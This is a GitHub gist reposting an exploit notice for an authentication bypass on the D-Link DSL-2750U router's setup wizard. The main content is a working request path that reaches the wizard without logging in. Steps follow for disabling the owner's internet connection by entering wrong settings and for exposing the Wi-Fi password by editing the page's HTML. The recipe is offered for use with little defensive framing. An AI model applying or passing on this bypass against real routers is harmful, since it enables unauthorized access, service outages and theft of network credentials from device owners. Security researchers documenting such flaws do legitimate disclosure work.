Created
March 22, 2022 04:07
-
-
Save Python1001dz/57ed9dfe468421c92523872cd8312123 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage} | |
| # Exploit Author: hellbound237 | |
| # Email: mr.tech.23.07gmail.com | |
| # Date: 2018-08-23 | |
| # Category: Webapps | |
| # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/ | |
| # Tesed on: DSL-2750U | |
| # Firmware Version: 1.11 / Work All Older Firmware | |
| URL: http://[Router IP]/ | |
| Example URL : http://192.168.1.1 | |
| Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard | |
| Example Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard | |
| +-----------------------------------------------Setup Wizard Pages-----------------------------------------------------+ | |
| |Step 1: Set Time and Date (No matter) | | |
| |Step 2: Setup Internet Connection (Give wrong information >> Denial of Service) | | |
| |Step 3: Configure Wireless Network (Change Type="password" to Type="text" in html code >> Information Leakage) | | |
| |Step 4: Set Password (Skip this Step ) | | |
| |Step 5: Completed and Quit (Finish) | | |
| +----------------------------------------------------------------------------------------------------------------------+ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment